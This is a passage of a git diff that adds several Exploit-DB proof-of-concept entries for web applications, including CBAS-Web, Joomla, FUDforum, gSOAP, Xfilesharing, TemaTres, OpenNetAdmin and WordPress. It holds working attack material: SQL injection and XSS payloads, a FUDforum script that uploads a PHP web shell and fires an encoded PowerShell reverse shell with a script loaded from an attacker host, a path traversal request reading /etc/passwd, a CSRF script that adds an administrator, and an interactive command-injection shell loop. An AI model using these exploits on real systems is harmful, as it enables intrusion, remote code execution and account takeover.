+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678
+
+
+##################################################################################################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/47631.txt b/exploits/php/webapps/47631.txt
new file mode 100644
index 000000000..507cdad9b
--- /dev/null
+++ b/exploits/php/webapps/47631.txt
@@ -0,0 +1,16 @@
+# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : N/A
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
+# PoC (id param):
+
+http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510
\ No newline at end of file
diff --git a/exploits/php/webapps/47632.txt b/exploits/php/webapps/47632.txt
new file mode 100644
index 000000000..bcbb83eb3
--- /dev/null
+++ b/exploits/php/webapps/47632.txt
@@ -0,0 +1,237 @@
+# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
+# Author: Pablo Santiago
+# Date: 2019-11-12
+# Vendor Homepage: https://www.joomla.org/
+# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
+# Version: 3.9.13
+# CVE : N/A
+# Tested on: Windows 10
+
+#PoC
+
+curl http://localhost/joomla/ -H "Host: exploit-db.com"
+
+<!DOCTYPE html>
+<html lang="en-gb" dir="ltr">
+<head>
+        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+        <meta charset="utf-8" />
+        <base href="http://exploit-db.com/joomla/" />
+        <meta name="description" content="javacript:alert(document.cookie)" />
+        <meta name="generator" content="Joomla! - Open Source Content
+Management" />
+        <title>Home</title>
+        <link href="/joomla/index.php?format=feed&type=rss"
+rel="alternate" type="application/rss+xml" title="RSS 2.0" />
+        <link href="/joomla/index.php?format=feed&type=atom"
+rel="alternate" type="application/atom+xml" title="Atom 1.0" />
+        <link href="/joomla/templates/protostar/favicon.ico"
+rel="shortcut icon" type="image/vnd.microsoft.icon" />
+        <link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
+rel="stylesheet" />
+        <link href="https://fonts.googleapis.com/css?family=Open+Sans"
+rel="stylesheet" />
+        <style>
+
+        h1, h2, h3, h4, h5, h6, .site-title {
+                font-family: 'Open Sans', sans-serif;
+        }
+        </style>
+        <script type="application/json" class="joomla-script-options
+new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
+        <script
+src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script
+src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script
+src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script
+src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script
+src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script
+src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <!--[if lt IE 9]><script
+src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
+        <script
+src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <!--[if lt IE 9]><script
+src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
+        <script
+src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
+        <script>
+jQuery(window).on('load',  function() {
+                                new JCaption('img.caption');
+jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
+initTooltips); function initTooltips (event, container) { container =
+container || document;$(container).find(".hasTooltip").tooltip({"html":
+true,"container": "body"});} });
+        </script>
+
+</head>
+<body class="site com_content view-featured no-layout no-task itemid-101">
+        <!-- Body -->
+        <div class="body" id="top">
+                <div class="container">
+                        <!-- Header -->
+                        <header class="header" role="banner">
+                                <div class="header-inner clearfix">
+                                        <a class="brand pull-left"
+href="/joomla/">
+                                                <span
+class="site-title"
+title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
+
+          </a>
+                                        <div class="header-search pull-right">
+
+                                        </div>
+                                </div>
+                        </header>
+
+                        <div class="row-fluid">
+                                                                <main
+id="content" role="main" class="span9">
+                                        <!-- Begin Content -->
+
+                                        <div id="system-message-container">
+        </div>
+
+                                        <div class="blog-featured"
+itemscope itemtype="https://schema.org/Blog">
+<div class="page-header">
+        <h1>
+        Home    </h1>
+</div>
+
+
+
+</div>
+
+                                        <div class="clearfix"></div>
+                                        <div aria-label="breadcrumbs"
+role="navigation">
+        <ul itemscope itemtype="https://schema.org/BreadcrumbList"
+class="breadcrumb">
+                                        <li>
+                                You are here: &#160;
+                        </li>
+
+                                                <li
+itemprop="itemListElement" itemscope
+itemtype="https://schema.org/ListItem" class="active">
+                                        <span itemprop="name">
+                                                Home
+                 </span>
+                                        <meta itemprop="position" content="1">
+                                </li>
+                                </ul>
+</div>
+
+                                        <!-- End Content -->
+                                </main>
+
+ <div id="aside" class="span3">
+                                                <!-- Begin Right Sidebar -->
+                                                <div class="well
+_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
+mod-list">
+<li class="item-101 default current active"><a
+href="/joomla/index.php" >Home</a></li></ul>
+</div><div class="well "><h3 class="page-header">Login Form</h3><form
+action="/joomla/index.php" method="post" id="login-form"
+class="form-inline">
+                <div class="userdata">
+                <div id="form-login-username" class="control-group">
+                        <div class="controls">
+
+ <div class="input-prepend">
+                                                <span class="add-on">
+                                                        <span
+class="icon-user hasTooltip" title="Username"></span>
+                                                        <label
+for="modlgn-username" class="element-invisible">Username</label>
+                                                </span>
+                                                <input
+id="modlgn-username" type="text" name="username" class="input-small"
+tabindex="0" size="18" placeholder="Username" />
+                                        </div>
+                                                        </div>
+                </div>
+                <div id="form-login-password" class="control-group">
+                        <div class="controls">
+
+ <div class="input-prepend">
+                                                <span class="add-on">
+                                                        <span
+class="icon-lock hasTooltip" title="Password">
+                                                        </span>
+                                                                <label
+for="modlgn-passwd" class="element-invisible">Password
+                             </label>
+                                                </span>
+                                                <input
+id="modlgn-passwd" type="password" name="password" class="input-small"
+tabindex="0" size="18" placeholder="Password" />
+                                        </div>
+                                                        </div>
+                </div>
+                                                <div
+id="form-login-remember" class="control-group checkbox">
+                        <label for="modlgn-remember"
+class="control-label">Remember Me</label> <input id="modlgn-remember"
+type="checkbox" name="remember" class="inputbox" value="yes"/>
+                </div>
+                                <div id="form-login-submit"
+class="control-group">
+                        <div class="controls">
+                                <button type="submit" tabindex="0"
+name="Submit" class="btn btn-primary login-button">Log in</button>
+                        </div>
+                </div>
+                                        <ul class="unstyled">
+                                                        <li>
+                                        <a
+href="/joomla/index.php/component/users/?view=remind&Itemid=101">
+                                        Forgot your username?</a>
+                                </li>
+                                <li>
+                                        <a
+href="/joomla/index.php/component/users/?view=reset&Itemid=101">
+                                        Forgot your password?</a>
+                                </li>
+                        </ul>
+                <input type="hidden" name="option" value="com_users" />
+                <input type="hidden" name="task" value="user.login" />
+                <input type="hidden" name="return"
+value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
+                <input type="hidden"
+name="d460ac322fbbb6ae67cc78034182d9e1" value="1" />       </div>
+        </form>
+</div>
+                                                <!-- End Right Sidebar -->
+                                        </div>
+                                                        </div>
+                </div>
+        </div>
+        <!-- Footer -->
+        <footer class="footer" role="contentinfo">
+                <div class="container">
+                        <hr />
+
+                        <p class="pull-right">
+                                <a href="#top" id="back-top">
+                                        Back to Top
+         </a>
+                        </p>
+                        <p>
+                                &copy; 2019
+javacript:alert(document.cookie)                    </p>
+                </div>
+        </footer>
+
+</body>
+</html>
+
+#PoC Visual
+https://imgur.com/a/IgO4ZxI
\ No newline at end of file
diff --git a/exploits/php/webapps/47650.txt b/exploits/php/webapps/47650.txt
new file mode 100644
index 000000000..1874ffca7
--- /dev/null
+++ b/exploits/php/webapps/47650.txt
@@ -0,0 +1,103 @@
+# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
+# Date: 2019-10-26
+# Exploit Author: liquidsky (JMcPeters)
+# Vulnerable Software: FUDForum 3.0.9
+# Vendor Homepage: https://sourceforge.net/projects/fudforum/
+# Version: 3.0.9
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
+# Tested On: Windows / mysql / apache
+# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
+# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
+# CVE: CVE-2019-18873
+
+
+// Greetz : wetw0rk, Fr13ndz, offsec =)
+//
+// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
+//              The areas impacted are the admin panel and the forum.
+//
+//  XSS via username in Forum:
+//  1.  Register an account and log in to the forum.
+//  2.  Go to the user control panel. -> Account Settings -> change login
+//  3.  Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
+//  4.  When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
+//
+//  XSS via user-agent in Admin Panel:
+//  1.  Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
+//  2.  Send the XSS payload below (from an IP associated with an account) / host the script:
+//  3.  curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
+//  4.  When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
+//
+
+function patience()
+{
+	var u=setTimeout("grabShell()",5000);
+}
+
+// This function is to call the reverse shell php script (liquidsky.php).
+// currently using a powershell payload that will need to be modified.
+function grabShell()
+{
+	var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
+ 	xhr = new XMLHttpRequest();
+	xhr.open("GET", url, true);
+	xhr.send(null);
+
+}
+
+function submitFormWithTokenJS(token) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
+
+    // Send the proper header information along with the request
+    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
+
+    var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
+    var fileName = "liquidsky.php";
+    var url      = "/fudforum/adm/admbrowse.php";
+    var ctype    = "application/x-php";
+    var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
+    var boundary = "-----------------------------9703186584101745941654835853";
+    var fileSize = fileData.length;
+
+    var body = "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
+    body += currentdir + "\r\n";
+    body += "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
+    body += token + "\r\n";
+    body += "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
+    body += "Content-Type: " + ctype + "\r\n\r\n";
+    body += fileData + "\r\n\r\n";
+    body += "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
+    body += "1" + "\r\n";
+    body += "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
+    body += fileName + "\r\n";
+    body += "--" + boundary + "\r\n";
+    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
+    body += "Upload File" + '\r\n';
+    body += "--" + boundary + "--";
+
+    xhr.send(body);
+}
+
+//Grab SQ token
+var req = new XMLHttpRequest();
+
+req.onreadystatechange=function()
+{
+  if (req.readyState == 4 && req.status == 200) {
+    var htmlPage = req.responseXML; /* fetch html */
+    var SQ = htmlPage.getElementsByTagName("input")[0]
+    submitFormWithTokenJS(SQ.value);
+  }
+}
+
+req.open("GET", "/fudforum/adm/admuser.php", true);
+req.responseType = "document";
+req.send();
+
+patience();
\ No newline at end of file
diff --git a/exploits/php/webapps/47653.txt b/exploits/php/webapps/47653.txt
new file mode 100644
index 000000000..1454f551f
--- /dev/null
+++ b/exploits/php/webapps/47653.txt
@@ -0,0 +1,27 @@
+# Title: gSOAP 2.8 - Directory Traversal
+# Author: Numan Türle
+# Date: 2019-11-13
+# Vendor Homepage: https://www.genivia.com/
+# Version : gSOAP 2.8
+# Software Link : https://www.genivia.com/products.html#gsoap
+
+
+POC
+---------
+
+GET /../../../../../../../../../etc/passwd HTTP/1.1
+Host: 10.200.106.101
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+HTTP/1.1 200 OK
+Server: gSOAP/2.8
+Content-Type: application/octet-stream
+Content-Length: 51
+Connection: close
+
+root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
\ No newline at end of file
diff --git a/exploits/php/webapps/47659.txt b/exploits/php/webapps/47659.txt
new file mode 100644
index 000000000..15d265792
--- /dev/null
+++ b/exploits/php/webapps/47659.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
+# Google Dork: inurl:/?op=registration
+# Date: 2019-11-4
+# Exploit Author: Noman Riffat
+# Vendor Homepage: https://sibsoft.net/xfilesharing.html
+# Version: <=2.5.1
+# CVE : CVE-2019-18951, CVE-2019-18952
+
+#####################
+Arbitrary File Upload
+#####################
+
+<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
+    <input type="text" name="sid" value="joe">
+    <input type="file" name="file">
+    <input type="submit" value="Upload" name="submit">
+</form>
+
+Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
+
+####################
+Local File Inclusion
+####################
+
+http://xyz.com/?op=page&tmpl=../../admin_settings
+
+This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.
+
+http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload
+
+The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.
+
+Noman Riffat, National Security Services Group Oman
+@nomanriffat, @nssgoman
\ No newline at end of file
diff --git a/exploits/php/webapps/47670.txt b/exploits/php/webapps/47670.txt
new file mode 100644
index 000000000..31ed0c49f
--- /dev/null
+++ b/exploits/php/webapps/47670.txt
@@ -0,0 +1,74 @@
+# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
+# Author: Pablo Santiago
+# Date: 2019-11-14
+# Vendor Homepage: https://www.vocabularyserver.com/
+# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
+# Version: 3.0
+# CVE : 2019–14345
+# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
+# Tested on: Windows 10
+
+# Description:
+# Web application for management formal representations of knowledge,
+# thesauri, taxonomies and multilingual vocabularies / Aplicación para
+# la gestión de representaciones formales del conocimiento, tesauros,
+# taxonomías, vocabularios multilingües.
+
+#Exploit
+
+import requests
+import sys
+
+session = requests.Session()
+
+http_proxy = “http://127.0.0.1:8080"
+https_proxy = “https://127.0.0.1:8080"
+
+proxyDict = {
+“http” : http_proxy,
+“https” : https_proxy
+}
+
+url = ‘http://localhost/tematres/vocab/login.php'
+values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
+‘id_password’: ‘admin’,
+‘task’:’login’}
+
+r = session.post(url, data=values, proxies=proxyDict)
+cookie = session.cookies.get_dict()[‘PHPSESSID’]
+
+print (cookie)
+
+host = sys.argv[1]
+user = input(‘[+]User:’)
+lastname = input(‘[+]lastname:’)
+password = input(‘[+]Password:’)
+password2 = input(‘[+]Confirm Password:’)
+email = input(‘[+]Email:’)
+
+if (password == password2):
+#configure proxy burp
+
+data = {
+‘_nombre’:user,
+‘_apellido’:lastname,
+‘_correo_electronico’:email,
+‘orga’:’bypassed’,
+‘_clave’:password,
+‘_confirmar_clave’:password2,
+‘isAdmin’:1,
+‘boton’:’Guardar’,
+‘userTask’:’A’,
+‘useactua’:’’
+
+}
+headers= {
+‘Cookie’: ‘PHPSESSID=’+cookie
+}
+request = session.post(host+’/tematres/vocab/admin.php’, data=data,
+headers=headers, proxies=proxyDict)
+print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
+print(‘Status Code:’+ str(request.status_code))
+
+else:
+print (‘Passwords dont match!!!’)
\ No newline at end of file
diff --git a/exploits/php/webapps/47672.txt b/exploits/php/webapps/47672.txt
new file mode 100644
index 000000000..a3e43c9c3
--- /dev/null
+++ b/exploits/php/webapps/47672.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting
+# Author: Pablo Santiago
+# Date: 2019-11-14
+# Vendor Homepage: https://www.vocabularyserver.com/
+# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
+# Version: 3.0
+# CVE : 2019–14343
+# Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053
+# Tested on: Windows 10
+
+#Description:
+The parameter "value" its vulnerable to Stored Cross-site scripting..
+
+#Payload: “><script>alert(“XSS”)<%2fscript>
+
+POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0)
+Gecko/20100101 Firefox/66.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 44
+Connection: close
+Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse
+Upgrade-Insecure-Requests: 1
+
+doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2
\ No newline at end of file
diff --git a/exploits/php/webapps/47691.sh b/exploits/php/webapps/47691.sh
new file mode 100755
index 000000000..0f956a065
--- /dev/null
+++ b/exploits/php/webapps/47691.sh
@@ -0,0 +1,23 @@
+# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
+# Date: 2019-11-19
+# Exploit Author: mattpascoe
+# Vendor Homepage: http://opennetadmin.com/
+# Software Link: https://github.com/opennetadmin/ona
+# Version: v18.1.1
+# Tested on: Linux
+
+# Exploit Title: OpenNetAdmin v18.1.1 RCE
+# Date: 2019-11-19
+# Exploit Author: mattpascoe
+# Vendor Homepage: http://opennetadmin.com/
+# Software Link: https://github.com/opennetadmin/ona
+# Version: v18.1.1
+# Tested on: Linux
+
+#!/bin/bash
+
+URL="${1}"
+while true;do
+ echo -n "$ "; read cmd
+ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
+done
\ No newline at end of file
diff --git a/exploits/php/webapps/47720.txt b/exploits/php/webapps/47720.txt
new file mode 100644
index 000000000..f35cf09ad
--- /dev/null
+++ b/exploits/php/webapps/47720.txt
@@ -0,0 +1,112 @@
+# Exploit Title : Wordpress 5.3 - User Disclosure
+# Author: SajjadBnd
+# Date: 2019-11-17
+# Software Link: https://wordpress.org/download/
+# version : wp < 5.3
+# tested on : Ubunutu 18.04 / python 2.7
+# CVE: N/A
+
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+#
+
+ 
+import requests
+import os
+import re
+import json
+import sys
+import urllib3
+ 
+def clear():
+    linux = 'clear'
+    windows = 'cls'
+    os.system([linux, windows][os.name == 'nt'])
+def Banner():
+        print('''
+- Wordpress < 5.3 - User Enumeration
+- SajjadBnd
+''')
+def Desc():
+    url = raw_input('[!] Url >> ')
+    vuln = url + "/wp-json/wp/v2/users/"
+    while True:
+        try:
+            r = requests.get(vuln,verify=False)
+            content = json.loads(r.text)
+            data(content)
+        except requests.exceptions.MissingSchema:
+        vuln = "http://" + vuln
+def data(content):
+    for x in content:
+    name = x["name"].encode('UTF-8')
+    print("======================")
+    print("[+] ID : " + str(x["id"]))
+    print("[+] Name : " + name)
+    print("[+] User : " + x["slug"])
+    sys.exit(1)
+if __name__ == '__main__':
+    urllib3.disable_warnings()
+    reload(sys)
+    sys.setdefaultencoding('UTF8')
+    clear()
+    Banner()
+    Desc()
+
+wpuser.txt
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+#
+# Exploit Title : Wordpress < 5.3 - User Disclosure
+# Exploit Author: SajjadBnd
+# email : blackwolf@post.com
+# Software Link: https://wordpress.org/download/
+# version : wp < 5.3
+# tested on : Ubunutu 18.04 / python 2.7
+
+import requests
+import os
+import re
+import json
+import sys
+import urllib3
+
+def clear():
+    linux = 'clear'
+    windows = 'cls'
+    os.system([linux, windows][os.name == 'nt'])
+
+def Banner():
+        print('''
+- Wordpress < 5.3 - User Enumeration
+- SajjadBnd
+''')
+
+def Desc():
+    url = raw_input('[!] Url >> ')
+    vuln = url + "/wp-json/wp/v2/users/"
+    while True:
+        try:
+            r = requests.get(vuln,verify=False)
+            content = json.loads(r.text)
+            data(content)
+    	except requests.exceptions.MissingSchema:
+	    vuln = "http://" + vuln
+
+def data(content):
+    for x in content:
+	name = x["name"].encode('UTF-8')
+	print("======================")
+	print("[+] ID : " + str(x["id"]))
+	print("[+] Name : " + name)
+	print("[+] User : " + x["slug"])
+    sys.exit(1)
+if __name__ == '__main__':
+    urllib3.disable_warnings()
+    reload(sys)
+    sys.setdefaultencoding('UTF8')
+    clear()
+    Banner()
+    Desc()
\ No newline at end of file
diff --git a/exploits/php/webapps/47725.txt b/exploits/php/webapps/47725.txt
new file mode 100644
index 000000000..bc19a4c25
--- /dev/null
+++ b/exploits/php/webapps/47725.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Link : https://bigprof.com/appgini/applications/online-inventory-manager
+# Software : Online Inventory Manager
+# Version : 3.2
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini
+# editgroups section. In editgroups section
+# (http://localhost/inventory/admin/pageEditGroup.php?groupID=1).
+
+# Payload i used:
